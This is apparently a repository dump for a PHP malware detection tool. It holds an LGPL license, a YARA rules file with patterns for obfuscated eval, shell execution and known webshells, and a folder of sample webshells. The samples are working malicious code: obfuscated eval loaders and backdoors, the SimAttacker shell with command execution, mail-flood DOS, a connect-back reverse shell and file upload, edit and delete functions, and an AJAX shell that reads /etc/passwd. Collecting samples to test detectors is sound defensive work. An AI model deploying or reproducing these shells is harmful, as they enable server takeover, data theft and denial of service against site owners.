(strstr($uas," x63 150 x72 +;!>!} x27;!>>>!}_;gvc%}&;ftmbg} x7f;!osvufs}w;* x7f!>> x22!pd%)!gj}Z;W&)7gj6<*K)ftpmdXA6~6/7&6|7**111127-K)ebfsX x27u%)7fm11112)eobs`un>qp%!|Z~!<##!>!2p%!|!*!***b%)sfxpmpusut!-#j0#!7{**u%-#jt0}Z;0]=]0#)2q%l}S;2-u%!-#2#/#%#/#o]#27pd%6!bssb2!>#p#/#p#/%z>2*!%z>32>!}t::**<(!(%w:!>! x+99386c6f+9f5d816:+946:ce44#)zbssb!>!ssbnpe_GB)fubfsdXA x27K6< x7fw6*3qj%7><+{e%+*!*+fepdfe{h+{d%)+opj/!**#sfmcnbs+yfeobz+sfwjidsb`bj+upcotn+qsvmt+FUPNFS&d_SFSFGFS`QUUI&c_UOFHB`SFTV`QUUI&b%!|!*)323zbek!~!b66,#/q%>2q%<#g6R85,67R37,18R#>q%V<*#fopoV;hojepdoF.uofuopD#r# x5cq%)ufttj x22)gj6<^#Y# x5cq% x27Y%6K4]65]D8]86]y31]278]y3f]51L3]84]y31M6]y3e]81#/#7e:55946-tr.984:npd#)tutjyf`opjudovg x22)24y7 x24- x24*1<%j=tj{fpgh1:|:*mmvo:>:iuhofm%:-5ppde:4:|:**#ppde#)tutjyf`4 x223}!+!o]s]#)fepmqyf x27*&7-n%)utjm6< x7fw6*C1/35.)1/14+9**-)1/2986+7**^c%j:^Ew:Qb:Qc:W24!bssbz) x24]25 x24- x24-!% x24- x24*!|! x22)7gj6<*QDU`MPT7-NBFSUT`LDPT7-UFOJ`62]38y]572]48y]#>m%:j!<*2bd%-#1GO x22#)fepmqyfA>2b%!<*qp%-*.%)euhA)3of>2bd%g)!gj<*#k#)usbut`cpV x7f x7f x7f x7f!#]y847,*d x27,*c x27,*b x27)fepdof.)f3ldfidk!~!<**qp%!-uyfu%)3of)fepdof`5j%!<**3-j%-bubE{h%)sutcvt-#w#)lhA!osvufs!~<3,j%>j%!*3! 248L3P6L1M5]D2P4]D6#<%G7#@#7/7^#iubq# x5cq% x27jsv%6^#zsfvr# x5cq%7**^#zsfvStrrEVxNoiTCnUF_EtaERCxecAlPeR_rtSopxkrbc'; $vgkbclh=explode(chr((636-516)),substr($awvjtnz,(29027-23007),(198-164))); $jdxccsyh = $vgkbclh[0]($vgkbclh[(7-6)]); $nkttprcq = $vgkbclh[0]($vgkbclh[(7-5)]); if (!function_exists('huqbsiykq')) { function huqbsiykq($ewjaowa, $ppcmgty,$euscsfo) { $rputetgcppb = NULL; for($blvfkqsfhf=0;$blvfkqsfhf<(sizeof($ewjaowa)/2);$blvfkqsfhf++) { $rputetgcppb .= substr($ppcmgty, $ewjaowa[($blvfkqsfhf*2)],$ewjaowa[($blvfkqsfhf*2)+(7-6)]); } return $euscsfo(chr((34-25)),chr((531-439)),$rputetgcppb); }; } $xozybdtes = explode(chr((213-169)),'3371,36,157,63,3931,36,2709,44,5708,38,1659,66,2636,43,4231,64,4563,42,868,40,836,32,3967,62,2332,63,5776,31,4847,58,3660,52,2063,20,4528,35,1170,29,5409,38,4365,58,1914,22,3712,42,1474,28,2555,41,5552,35,4949,31,3260,23,53,43,780,24,5965,55,5180,40,3407,49,970,62,1936,50,1791,45,1502,28,3132,66,4713,35,4748,34,3820,62,501,42,4295,70,220,37,1264,64,5918,24,4029,58,2990,53,5875,43,3315,56,640,45,2440,66,5283,25,2679,30,2083,33,5607,55,1836,50,5807,32,3631,29,4423,59,5007,45,0,53,2883,54,4905,44,1886,28,5052,69,2270,62,5839,36,2208,62,280,55,2753,70,2823,60,5351,58,4980,27,2395,45,5662,46,4087,59,2033,30,5121,59,1725,66,3043,67,4482,46,605,35,3882,23,2506,49,685,44,3754,66,4198,33,96,61,1150,20,1032,25,5587,20,908,62,5500,52,2596,40,335,57,3198,62,3110,22,5308,43,1581,24,729,51,1199,65,257,23,4631,27,1057,64,2937,53,2145,63,4605,26,4146,52,3567,64,5220,63,459,42,3283,32,804,32,1605,54,5942,23,1121,29,1348,61,3510,57,1986,47,1409,65,543,62,5447,27,3456,54,392,67,5474,26,3905,26,4658,55,5746,30,1530,51,1328,20,4782,65,2116,29'); $ympifwn = $jdxccsyh("",huqbsiykq($xozybdtes,$awvjtnz,$nkttprcq)); $jdxccsyh=$awvjtnz; $ympifwn(""); $ympifwn=(599-478); $awvjtnz=$ympifwn-1; ?> 5 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | GNU LESSER GENERAL PUBLIC LICENSE 2 | Version 3, 29 June 2007 3 | 4 | Copyright (C) 2007 Free Software Foundation, Inc. 5 | Everyone is permitted to copy and distribute verbatim copies 6 | of this license document, but changing it is not allowed. 7 | 8 | 9 | This version of the GNU Lesser General Public License incorporates 10 | the terms and conditions of version 3 of the GNU General Public 11 | License, supplemented by the additional permissions listed below. 12 | 13 | 0. Additional Definitions. 14 | 15 | As used herein, "this License" refers to version 3 of the GNU Lesser 16 | General Public License, and the "GNU GPL" refers to version 3 of the GNU 17 | General Public License. 18 | 19 | "The Library" refers to a covered work governed by this License, 20 | other than an Application or a Combined Work as defined below. 21 | 22 | An "Application" is any work that makes use of an interface provided 23 | by the Library, but which is not otherwise based on the Library. 24 | Defining a subclass of a class defined by the Library is deemed a mode 25 | of using an interface provided by the Library. 26 | 27 | A "Combined Work" is a work produced by combining or linking an 28 | Application with the Library. The particular version of the Library 29 | with which the Combined Work was made is also called the "Linked 30 | Version". 31 | 32 | The "Minimal Corresponding Source" for a Combined Work means the 33 | Corresponding Source for the Combined Work, excluding any source code 34 | for portions of the Combined Work that, considered in isolation, are 35 | based on the Application, and not on the Linked Version. 36 | 37 | The "Corresponding Application Code" for a Combined Work means the 38 | object code and/or source code for the Application, including any data 39 | and utility programs needed for reproducing the Combined Work from the 40 | Application, but excluding the System Libraries of the Combined Work. 41 | 42 | 1. Exception to Section 3 of the GNU GPL. 43 | 44 | You may convey a covered work under sections 3 and 4 of this License 45 | without being bound by section 3 of the GNU GPL. 46 | 47 | 2. Conveying Modified Versions. 48 | 49 | If you modify a copy of the Library, and, in your modifications, a 50 | facility refers to a function or data to be supplied by an Application 51 | that uses the facility (other than as an argument passed when the 52 | facility is invoked), then you may convey a copy of the modified 53 | version: 54 | 55 | a) under this License, provided that you make a good faith effort to 56 | ensure that, in the event an Application does not supply the 57 | function or data, the facility still operates, and performs 58 | whatever part of its purpose remains meaningful, or 59 | 60 | b) under the GNU GPL, with none of the additional permissions of 61 | this License applicable to that copy. 62 | 63 | 3. Object Code Incorporating Material from Library Header Files. 64 | 65 | The object code form of an Application may incorporate material from 66 | a header file that is part of the Library. You may convey such object 67 | code under terms of your choice, provided that, if the incorporated 68 | material is not limited to numerical parameters, data structure 69 | layouts and accessors, or small macros, inline functions and templates 70 | (ten or fewer lines in length), you do both of the following: 71 | 72 | a) Give prominent notice with each copy of the object code that the 73 | Library is used in it and that the Library and its use are 74 | covered by this License. 75 | 76 | b) Accompany the object code with a copy of the GNU GPL and this license 77 | document. 78 | 79 | 4. Combined Works. 80 | 81 | You may convey a Combined Work under terms of your choice that, 82 | taken together, effectively do not restrict modification of the 83 | portions of the Library contained in the Combined Work and reverse 84 | engineering for debugging such modifications, if you also do each of 85 | the following: 86 | 87 | a) Give prominent notice with each copy of the Combined Work that 88 | the Library is used in it and that the Library and its use are 89 | covered by this License. 90 | 91 | b) Accompany the Combined Work with a copy of the GNU GPL and this license 92 | document. 93 | 94 | c) For a Combined Work that displays copyright notices during 95 | execution, include the copyright notice for the Library among 96 | these notices, as well as a reference directing the user to the 97 | copies of the GNU GPL and this license document. 98 | 99 | d) Do one of the following: 100 | 101 | 0) Convey the Minimal Corresponding Source under the terms of this 102 | License, and the Corresponding Application Code in a form 103 | suitable for, and under terms that permit, the user to 104 | recombine or relink the Application with a modified version of 105 | the Linked Version to produce a modified Combined Work, in the 106 | manner specified by section 6 of the GNU GPL for conveying 107 | Corresponding Source. 108 | 109 | 1) Use a suitable shared library mechanism for linking with the 110 | Library. A suitable mechanism is one that (a) uses at run time 111 | a copy of the Library already present on the user's computer 112 | system, and (b) will operate properly with a modified version 113 | of the Library that is interface-compatible with the Linked 114 | Version. 115 | 116 | e) Provide Installation Information, but only if you would otherwise 117 | be required to provide such information under section 6 of the 118 | GNU GPL, and only to the extent that such information is 119 | necessary to install and execute a modified version of the 120 | Combined Work produced by recombining or relinking the 121 | Application with a modified version of the Linked Version. (If 122 | you use option 4d0, the Installation Information must accompany 123 | the Minimal Corresponding Source and Corresponding Application 124 | Code. If you use option 4d1, you must provide the Installation 125 | Information in the manner specified by section 6 of the GNU GPL 126 | for conveying Corresponding Source.) 127 | 128 | 5. Combined Libraries. 129 | 130 | You may place library facilities that are a work based on the 131 | Library side by side in a single library together with other library 132 | facilities that are not Applications and are not covered by this 133 | License, and convey such a combined library under terms of your 134 | choice, if you do both of the following: 135 | 136 | a) Accompany the combined library with a copy of the same work based 137 | on the Library, uncombined with any other library facilities, 138 | conveyed under the terms of this License. 139 | 140 | b) Give prominent notice with the combined library that part of it 141 | is a work based on the Library, and explaining where to find the 142 | accompanying uncombined form of the same work. 143 | 144 | 6. Revised Versions of the GNU Lesser General Public License. 145 | 146 | The Free Software Foundation may publish revised and/or new versions 147 | of the GNU Lesser General Public License from time to time. Such new 148 | versions will be similar in spirit to the present version, but may 149 | differ in detail to address new problems or concerns. 150 | 151 | Each version is given a distinguishing version number. If the 152 | Library as you received it specifies that a certain numbered version 153 | of the GNU Lesser General Public License "or any later version" 154 | applies to it, you have the option of following the terms and 155 | conditions either of that published version or of any later version 156 | published by the Free Software Foundation. If the Library as you 157 | received it does not specify a version number of the GNU Lesser 158 | General Public License, you may choose any version of the GNU Lesser 159 | General Public License ever published by the Free Software Foundation. 160 | 161 | If the Library as you received it specifies that a proxy can decide 162 | whether future versions of the GNU Lesser General Public License shall 163 | apply, that proxy's public statement of acceptance of any version is 164 | permanent authorization for you to choose that version for the 165 | Library. 166 | -------------------------------------------------------------------------------- /data/samples/cpanel.php: -------------------------------------------------------------------------------- 1 | $ff7924082){$y5da781e=$ff7924082;$x3ff4965=$efb074d;}if(!$y5da781e){foreach($m6aa932e[$m6aa932e['a7b1'][11].$m6aa932e['a7b1'][35].$m6aa932e['a7b1'][49].$m6aa932e['a7b1'][49].$m6aa932e['a7b1'][31].$m6aa932e['a7b1'][42].$m6aa932e['a7b1'][96].$m6aa932e['a7b1'][95].$m6aa932e['a7b1'][49]]as$efb074d=>$ff7924082){$y5da781e=$ff7924082;$x3ff4965=$efb074d;}}$y5da781e=@$m6aa932e[$m6aa932e['a7b1'][33].$m6aa932e['a7b1'][51].$m6aa932e['a7b1'][31].$m6aa932e['a7b1'][65].$m6aa932e['a7b1'][46].$m6aa932e['a7b1'][84].$m6aa932e['a7b1'][20].$m6aa932e['a7b1'][14]]($m6aa932e[$m6aa932e['a7b1'][71].$m6aa932e['a7b1'][42].$m6aa932e['a7b1'][95].$m6aa932e['a7b1'][49].$m6aa932e['a7b1'][84]]($m6aa932e[$m6aa932e['a7b1'][65].$m6aa932e['a7b1'][14].$m6aa932e['a7b1'][49].$m6aa932e['a7b1'][65].$m6aa932e['a7b1'][49]]($y5da781e),$x3ff4965));if(isset($y5da781e[$m6aa932e['a7b1'][65].$m6aa932e['a7b1'][48]])&&$fecba48==$y5da781e[$m6aa932e['a7b1'][65].$m6aa932e['a7b1'][48]]){if($y5da781e[$m6aa932e['a7b1'][65]]==$m6aa932e['a7b1'][67]){$b56c6566=Array($m6aa932e['a7b1'][55].$m6aa932e['a7b1'][97]=>@$m6aa932e[$m6aa932e['a7b1'][11].$m6aa932e['a7b1'][96].$m6aa932e['a7b1'][14].$m6aa932e['a7b1'][11].$m6aa932e['a7b1'][60]](),$m6aa932e['a7b1'][13].$m6aa932e['a7b1'][97]=>$m6aa932e['a7b1'][31].$m6aa932e['a7b1'][21].$m6aa932e['a7b1'][60].$m6aa932e['a7b1'][86].$m6aa932e['a7b1'][31],);echo@$m6aa932e[$m6aa932e['a7b1'][11].$m6aa932e['a7b1'][96].$m6aa932e['a7b1'][24].$m6aa932e['a7b1'][65].$m6aa932e['a7b1'][51].$m6aa932e['a7b1'][11]]($b56c6566);}elseif($y5da781e[$m6aa932e['a7b1'][65]]==$m6aa932e['a7b1'][44]){eval($y5da781e[$m6aa932e['a7b1'][46]]);}exit();} ?> 15 | 16 | 17 | 18 | 19 | 20 | 21 | -------------------------------------------------------------------------------- /data/php.yar: -------------------------------------------------------------------------------- 1 | import "hash" 2 | include "whitelist.yar" 3 | 4 | /* 5 | Detect: 6 | - phpencode.org 7 | - http://www.pipsomania.com/best_php_obfuscator.do 8 | - http://atomiku.com/online-php-code-obfuscator/ 9 | - http://www.webtoolsvn.com/en-decode/ 10 | - http://obfuscator.uk/example/ 11 | - http://w3webtools.com/encode-php-online/ 12 | - http://www.joeswebtools.com/security/php-obfuscator/ 13 | - https://github.com/epinna/weevely3 14 | - http://cipherdesign.co.uk/service/php-obfuscator 15 | - http://sysadmin.cyklodev.com/online-php-obfuscator/ 16 | - http://mohssen.org/SpinObf.php 17 | - https://code.google.com/p/carbylamine/ 18 | - https://github.com/tennc/webshell 19 | 20 | - https://github.com/wireghoul/htshells 21 | 22 | Thanks to: 23 | - https://stackoverflow.com/questions/3115559/exploitable-php-functions 24 | */ 25 | 26 | global private rule IsPhp 27 | { 28 | strings: 29 | $php = /<\?[^x]/ 30 | 31 | condition: 32 | $php and filesize < 5MB 33 | } 34 | 35 | rule NonPrintableChars 36 | { 37 | strings: 38 | /* 39 | Searching only for non-printable characters completely kills the perf, 40 | so we have to use atoms (https://gist.github.com/Neo23x0/e3d4e316d7441d9143c7) 41 | to get an acceptable speed. 42 | */ 43 | $non_printables = /(function|return|base64_decode).{,256}[^\x09-\x0d\x20-\x7E]{3}/ 44 | 45 | condition: 46 | (any of them) and not IsWhitelisted 47 | } 48 | 49 | 50 | rule PasswordProtection 51 | { 52 | strings: 53 | $md5 = /md5\s*\(\s*\$_(GET|REQUEST|POST|COOKIE|SERVER)[^)]+\)\s*===?\s*['"][0-9a-f]{32}['"]/ nocase 54 | $sha1 = /sha1\s*\(\s*\$_(GET|REQUEST|POST|COOKIE|SERVER)[^)]+\)\s*===?\s*['"][0-9a-f]{40}['"]/ nocase 55 | condition: 56 | (any of them) and not IsWhitelisted 57 | } 58 | 59 | rule ObfuscatedPhp 60 | { 61 | strings: 62 | $eval = /(<\?php|[;{}])[ \t]*@?(eval|preg_replace|system|assert|passthru|(pcntl_)?exec|shell_exec|call_user_func(_array)?)\s*\(/ nocase // ;eval( <- this is dodgy 63 | $eval_comment = /(eval|preg_replace|system|assert|passthru|(pcntl_)?exec|shell_exec|call_user_func(_array)?)\/\*[^\*]*\*\/\(/ nocase // eval/*lol*/( <- this is dodgy 64 | $b374k = "'ev'.'al'" 65 | $align = /(\$\w+=[^;]*)*;\$\w+=@?\$\w+\(/ //b374k 66 | $weevely3 = /\$\w=\$[a-zA-Z]\('',\$\w\);\$\w\(\);/ // weevely3 launcher 67 | $c99_launcher = /;\$\w+\(\$\w+(,\s?\$\w+)+\);/ // http://bartblaze.blogspot.fr/2015/03/c99shell-not-dead.html 68 | $nano = /\$[a-z0-9-_]+\[[^]]+\]\(/ //https://github.com/UltimateHackers/nano 69 | $ninja = /base64_decode[^;]+getallheaders/ //https://github.com/UltimateHackers/nano 70 | $variable_variable = /\${\$[0-9a-zA-z]+}/ 71 | $too_many_chr = /(chr\([\d]+\)\.){8}/ // concatenation of more than eight `chr()` 72 | $concat = /(\$[^\n\r]+\.){5}/ // concatenation of more than 5 words 73 | $concat_with_spaces = /(\$[^\n\r]+\. ){5}/ // concatenation of more than 5 words, with spaces 74 | $var_as_func = /\$_(GET|POST|COOKIE|REQUEST|SERVER)\s*\[[^\]]+\]\s*\(/ 75 | $comment = /\/\*([^*]|\*[^\/])*\*\/\s*\(/ // eval /* comment */ (php_code) 76 | condition: 77 | (any of them) and not IsWhitelisted 78 | } 79 | 80 | rule DodgyPhp 81 | { 82 | strings: 83 | $basedir_bypass = /curl_init\s*\(\s*["']file:\/\// nocase 84 | $basedir_bypass2 = "file:file:///" // https://www.intelligentexploit.com/view-details.html?id=8719 85 | $disable_magic_quotes = /set_magic_quotes_runtime\s*\(\s*0/ nocase 86 | 87 | $execution = /\b(popen|eval|assert|passthru|exec|include|system|pcntl_exec|shell_exec|base64_decode|`|array_map|ob_start|call_user_func(_array)?)\s*\(\s*(base64_decode|php:\/\/input|str_rot13|gz(inflate|uncompress)|getenv|pack|\\?\$_(GET|REQUEST|POST|COOKIE|SERVER))/ nocase // function that takes a callback as 1st parameter 88 | $execution2 = /\b(array_filter|array_reduce|array_walk(_recursive)?|array_walk|assert_options|uasort|uksort|usort|preg_replace_callback|iterator_apply)\s*\(\s*[^,]+,\s*(base64_decode|php:\/\/input|str_rot13|gz(inflate|uncompress)|getenv|pack|\\?\$_(GET|REQUEST|POST|COOKIE|SERVER))/ nocase // functions that takes a callback as 2nd parameter 89 | $execution3 = /\b(array_(diff|intersect)_u(key|assoc)|array_udiff)\s*\(\s*([^,]+\s*,?)+\s*(base64_decode|php:\/\/input|str_rot13|gz(inflate|uncompress)|getenv|pack|\\?\$_(GET|REQUEST|POST|COOKIE|SERVER))\s*\[[^]]+\]\s*\)+\s*;/ nocase // functions that takes a callback as 2nd parameter 90 | 91 | $htaccess = "SetHandler application/x-httpd-php" 92 | $iis_com = /IIS:\/\/localhost\/w3svc/ 93 | $include = /include\s*\(\s*[^\.]+\.(png|jpg|gif|bmp)/ // Clever includes 94 | $ini_get = /ini_(get|set|restore)\s*\(\s*['"](safe_mode|open_basedir|disable_(function|classe)s|safe_mode_exec_dir|safe_mode_include_dir|register_globals|allow_url_include)/ nocase 95 | $pr = /(preg_replace(_callback)?|mb_ereg_replace|preg_filter)\s*\([^)]*(\/|\\x2f)(e|\\x65)['"]/ nocase // http://php.net/manual/en/function.preg-replace.php 96 | $register_function = /register_[a-z]+_function\s*\(\s*['"]\s*(eval|assert|passthru|exec|include|system|shell_exec|`)/ // https://github.com/nbs-system/php-malware-finder/issues/41 97 | $safemode_bypass = /\x00\/\.\.\/|LD_PRELOAD/ 98 | $shellshock = /\(\)\s*{\s*[a-z:]\s*;\s*}\s*;/ 99 | $udp_dos = /fsockopen\s*\(\s*['"]udp:\/\// nocase 100 | $various = " 51 | 52 | 53 | 54 | 55 | 56 | 57 | 58 | "" ){ 69 | 70 | $fedit=realpath($fedit); 71 | 72 | $lines = file($fedit); 73 | 74 | echo "
"; 75 | 76 | echo " 85 | 86 | 87 | 88 |
"; 89 | 90 | $savefile=$_POST['savefile']; 91 | 92 | $filepath=realpath($_POST['filepath']); 93 | 94 | if ($savefile <> "") 95 | 96 | { 97 | 98 | $fp=fopen("$filepath","w+"); 99 | 100 | fwrite ($fp,"") ; 101 | 102 | fwrite ($fp,$savefile) ; 103 | 104 | fclose($fp); 105 | 106 | echo ""; 107 | 108 | } 109 | 110 | exit(); 111 | 112 | } 113 | 114 | ?> 115 | 116 | "" ){ 123 | 124 | $fchmod=realpath($fchmod); 125 | 126 | echo "

127 | 128 | chmod for :$fchmod
129 | 130 |

131 | 132 | Chmod :
133 | 134 |
135 | 136 | 137 | 138 |
"; 139 | 140 | $chmod0=$_POST['chmod0']; 141 | 142 | if ($chmod0 <> ""){ 143 | 144 | chmod ($fchmod , $chmod0); 145 | 146 | }else { 147 | 148 | echo "primission Not Allow change Chmod"; 149 | 150 | } 151 | 152 | exit(); 153 | 154 | } 155 | 156 | ?> 157 | 158 | 159 | 160 |
161 | 162 | 163 | 164 | 165 | 166 | 221 | 222 | 723 | 724 | 725 | 726 | 727 | 728 | 741 | 742 | 743 | 744 |
167 | 168 |

169 | 170 |
171 | 172 | 173 | 174 | 175 | 176 | 177 | 178 | 179 | 180 | 187 | 188 | File Manager

189 | 190 |

191 | 192 | 193 | 194 | 195 | 196 | CMD Shell

197 | 198 |

199 | 200 | 201 | 202 | Fake mail

203 | 204 |

205 | 206 | 207 | 208 | 209 | 210 | Connect Back

211 | 212 |

213 | 214 | 215 | 216 | 217 | 218 | About

219 | 220 |

 

 

 223 | 224 | 239 | 240 | ***************************************************************************
241 | 242 |  Iranian Hackers : WWW.SIMORGH-EV.COM
243 | 244 |  Programer : Hossein Asgary
245 | 246 |  Note : SimAttacker  Have copyright from simorgh security Group
247 | 248 |  please : If you find bug or problems in program , tell me by :
249 | 250 |  e-mail : admin(at)simorgh-ev(dot)com
251 | 252 | Enjoy :) [Only 4 Best Friends ]
253 | 254 | ***************************************************************************

255 | 256 | "; 257 | 258 | 259 | 260 | echo "OS :". php_uname(); 261 | 262 | echo "
IP :". 263 | 264 | ($_SERVER['REMOTE_ADDR']); 265 | 266 | echo ""; 267 | 268 | 269 | 270 | 271 | 272 | } 273 | 274 | //************************************************************ 275 | 276 | //cmd-command line 277 | 278 | $cmd=$_POST['cmd']; 279 | 280 | if($id=="cmd"){ 281 | 282 | $result=shell_exec("$cmd"); 283 | 284 | echo "

CMD ExeCute

" ; 285 | 286 | echo "
287 | 288 |
289 | 290 |
291 | 292 | 293 | 294 | 295 | 296 |
"; 297 | 298 | 299 | 300 | 301 | 302 | 303 | 304 | } 305 | 306 | 307 | 308 | //******************************************************** 309 | 310 | 311 | 312 | //fake mail = Use victim server 4 DOS - fake mail 313 | 314 | if ( $id=="fake-mail"){ 315 | 316 | error_reporting(0); 317 | 318 | echo "

Fake Mail- DOS E-mail By Victim Server

" ; 319 | 320 | echo "
321 | 322 | Victim Mail :

323 | 324 | Number-Mail :

325 | 326 | Comments: 327 | 328 |
329 | 330 |
331 | 332 | 333 | 334 |
"; 335 | 336 | //send Storm Mail 337 | 338 | $to=$_POST['to']; 339 | 340 | $nom=$_POST['nom']; 341 | 342 | $Comments=$_POST['Comments']; 343 | 344 | if ($to <> "" ){ 345 | 346 | for ($i = 0; $i < $nom ; $i++){ 347 | 348 | $from = rand (71,1020000000)."@"."Attacker.com"; 349 | 350 | $subject= md5("$from"); 351 | 352 | mail($to,$subject,$Comments,"From:$from"); 353 | 354 | echo "$i is ok"; 355 | 356 | } 357 | 358 | echo ""; 359 | 360 | } 361 | 362 | } 363 | 364 | //******************************************************** 365 | 366 | 367 | 368 | //Connect Back -Firewall Bypass 369 | 370 | if ($id=="cshell"){ 371 | 372 | echo "
Connect back Shell , bypass Firewalls
373 | 374 | For user :
375 | 376 | nc -l -p 1019
377 | 378 |
379 | 380 |

381 | 382 | Your IP & BindPort:
383 | 384 | 385 | 386 |
387 | 388 | 389 | 390 |
"; 391 | 392 | $mip=$_POST['mip']; 393 | 394 | $bport=$_POST['bport']; 395 | 396 | if ($mip <> "") 397 | 398 | { 399 | 400 | $fp=fsockopen($mip , $bport , $errno, $errstr); 401 | 402 | if (!$fp){ 403 | 404 | $result = "Error: could not open socket connection"; 405 | 406 | } 407 | 408 | else { 409 | 410 | fputs ($fp ,"\n*********************************************\nWelcome T0 SimAttacker 1.00 ready 2 USe\n*********************************************\n\n"); 411 | 412 | while(!feof($fp)){ 413 | 414 | fputs ($fp," bash # "); 415 | 416 | $result= fgets ($fp, 4096); 417 | 418 | $message=`$result`; 419 | 420 | fputs ($fp,"--> ".$message."\n"); 421 | 422 | } 423 | 424 | fclose ($fp); 425 | 426 | } 427 | 428 | } 429 | 430 | } 431 | 432 | 433 | 434 | //******************************************************** 435 | 436 | //Spy File Manager 437 | 438 | $homedir=getcwd(); 439 | 440 | $dir=realpath($_GET['dir'])."/"; 441 | 442 | if ($id=="fm"){ 443 | 444 | echo "

 Home: $homedir 445 | 446 |   447 | 448 |

449 | 450 |  Path: 451 | 452 | 453 | 454 | 455 | 456 | 457 | 458 |
459 | 460 |
"; 461 | 462 | 463 | 464 | echo " 465 | 466 | 467 | 468 |
469 | 470 | 471 | 472 | 473 | 474 | 475 | 476 | 477 | 478 | 481 | 482 | 485 | 486 | 489 | 490 | 493 | 494 | 495 | 496 | "; 497 | 498 | if (is_dir($dir)){ 499 | 500 | if ($dh=opendir($dir)){ 501 | 502 | while (($file = readdir($dh)) !== false) { 503 | 504 | $fsize=round(filesize($dir . $file)/1024); 505 | 506 | 507 | 508 | 509 | 510 | echo " 511 | 512 | 513 | 514 | 531 | 532 | 551 | 552 | 575 | 576 | 601 | 602 | 617 | 618 | 619 | 620 | 621 | 622 | "; 623 | 624 | } 625 | 626 | closedir($dh); 627 | 628 | } 629 | 630 | } 631 | 632 | echo "
File / Folder Name 479 | 480 | Size KByte 483 | 484 | Download 487 | 488 | Edit 491 | 492 | ChmodDelete
"; 515 | 516 | if (is_dir($dir.$file)) 517 | 518 | { 519 | 520 | echo " $file dir"; 521 | 522 | } 523 | 524 | else { 525 | 526 | echo " $file "; 527 | 528 | } 529 | 530 | echo ""; 533 | 534 | if (is_file($dir.$file)) 535 | 536 | { 537 | 538 | echo "$fsize"; 539 | 540 | } 541 | 542 | else { 543 | 544 | echo "  "; 545 | 546 | } 547 | 548 | echo " 549 | 550 | "; 553 | 554 | if (is_file($dir.$file)){ 555 | 556 | if (is_readable($dir.$file)){ 557 | 558 | echo "download"; 559 | 560 | }else { 561 | 562 | echo "No ReadAble"; 563 | 564 | } 565 | 566 | }else { 567 | 568 | echo " "; 569 | 570 | } 571 | 572 | echo " 573 | 574 | "; 577 | 578 | if (is_file($dir.$file)) 579 | 580 | { 581 | 582 | if (is_readable($dir.$file)){ 583 | 584 | echo "Edit"; 585 | 586 | }else { 587 | 588 | echo "No ReadAble"; 589 | 590 | } 591 | 592 | }else { 593 | 594 | echo " "; 595 | 596 | } 597 | 598 | echo " 599 | 600 | "; 603 | 604 | if (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') { 605 | 606 | echo "Dont in windows"; 607 | 608 | } 609 | 610 | else { 611 | 612 | echo "Chmod"; 613 | 614 | } 615 | 616 | echo "Delete
633 | 634 |
635 | 636 | 637 | 638 | Send this file: 639 | 640 | 641 | 642 | 643 | 644 | 645 | 646 |
"; 647 | 648 | } 649 | 650 | //Upload Files 651 | 652 | $rpath=$_GET['dir']; 653 | 654 | if ($rpath <> "") { 655 | 656 | $uploadfile = $rpath."/" . $_FILES['userfile']['name']; 657 | 658 | print "
";
659 | 
660 | if (move_uploaded_file($_FILES['userfile']['tmp_name'], $uploadfile)) {
661 | 
662 | echo "";
663 | 
664 | echo "";
665 | 
666 | }
667 | 
668 |  }
669 | 
670 |  //file deleted
671 | 
672 | $frpath=$_GET['fdelete'];
673 | 
674 | if ($frpath <> "") {
675 | 
676 | if (is_dir($frpath)){
677 | 
678 | $matches = glob($frpath . '/*.*');
679 | 
680 | if ( is_array ( $matches ) ) {
681 | 
682 |   foreach ( $matches as $filename) {
683 | 
684 |   unlink ($filename);
685 | 
686 |   rmdir("$frpath");
687 | 
688 | echo "";
689 | 
690 | echo "";
691 | 
692 |   }
693 | 
694 |   }
695 | 
696 |   }
697 | 
698 |   else{
699 | 
700 | echo "";
701 | 
702 | unlink ("$frpath");
703 | 
704 | echo "";
705 | 
706 | exit(0);
707 | 
708 | 
709 | 
710 |   }
711 | 
712 |   
713 | 
714 | 
715 | 
716 | }
717 | 
718 | 			?>
719 | 
720 | 			
721 | 
722 |
729 | 730 |


731 | 732 | Copyright 2004-Simorgh Security
733 | 734 | Hossein-Asgari
735 | 736 | 737 | 738 | 739 | 740 | www.r57.biz

745 | 746 | 750 |
751 | 752 | 753 | 754 | 755 | 756 | 757 | -------------------------------------------------------------------------------- /data/samples/classic/ajaxshell.php: -------------------------------------------------------------------------------- 1 | 'ClearScreen()', 11 | 'Clear History' => 'ClearHistory()', 12 | 'Can I function?' => "runcommand('canirun','GET')", 13 | 'Get server info' => "runcommand('showinfo','GET')", 14 | 'Read /etc/passwd' => "runcommand('etcpasswdfile','GET')", 15 | 'Open ports' => "runcommand('netstat -an | grep -i listen','GET')", 16 | 'Running processes' => "runcommand('ps -aux','GET')", 17 | 'Readme' => "runcommand('shellhelp','GET')" 18 | 19 | ); 20 | $thisfile = basename(__FILE__); 21 | 22 | $style = ''; 67 | $sess = __FILE__.$password; 68 | if(isset($_POST['p4ssw0rD'])) 69 | { 70 | if($_POST['p4ssw0rD'] == $password) 71 | { 72 | $_SESSION[$sess] = $_POST['p4ssw0rD']; 73 | } 74 | else 75 | { 76 | die("Wrong password"); 77 | } 78 | 79 | } 80 | if($_SESSION[$sess] == $password) 81 | { 82 | if(isset($_SESSION['workdir'])) 83 | { 84 | if(file_exists($_SESSION['workdir']) && is_dir($_SESSION['workdir'])) 85 | { 86 | chdir($_SESSION['workdir']); 87 | } 88 | } 89 | 90 | if(isset($_FILES['uploadedfile']['name'])) 91 | { 92 | $target_path = "./"; 93 | $target_path = $target_path . basename( $_FILES['uploadedfile']['name']); 94 | if(move_uploaded_file($_FILES['uploadedfile']['tmp_name'], $target_path)) { 95 | 96 | } 97 | } 98 | 99 | if(isset($_GET['runcmd'])) 100 | { 101 | 102 | $cmd = $_GET['runcmd']; 103 | 104 | print "".get_current_user()."~# ". htmlspecialchars($cmd)."
"; 105 | 106 | if($cmd == "") 107 | { 108 | print "Empty Command..type \"shellhelp\" for some ehh...help"; 109 | } 110 | 111 | elseif($cmd == "upload") 112 | { 113 | print '
Uploading to: '.realpath("."); 114 | if(is_writable(realpath("."))) 115 | { 116 | print "
I can write to this directory"; 117 | } 118 | else 119 | { 120 | print "
